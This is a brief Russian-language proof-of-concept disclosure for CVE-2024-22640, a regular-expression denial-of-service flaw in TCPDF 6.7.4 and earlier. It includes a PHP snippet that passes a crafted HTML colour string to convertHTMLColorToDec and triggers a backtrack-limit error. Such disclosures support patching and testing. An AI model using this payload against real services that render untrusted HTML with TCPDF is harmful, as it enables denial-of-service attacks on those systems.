
Эксплойт с доказательством концепции для CVE-2024-22640, ReDoS-уязвимости в TCPDF <=6.7.4, вызванной специально сформированным вводом цвета HTML, с демонстрационным кодом.
Регулярное выражение, вызывающее отказ в обслуживании (ReDoS)
TCPDF <= 6.7.4
TCPDF разбирает HTML-цвет, содержащий специально сформированную нагрузку.
Версия TCPDF <= 6.7.4 уязвима для ReDoS (отказ в обслуживании через регулярное выражение) при разборе недоверенной HTML-страницы со специально сформированным цветом.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Примечание: Проверка с помощью preg_last_error() после уязвимой строки кода покажет, что регулярное выражение завершится с PREG_BACKTRACK_LIMIT_ERROR.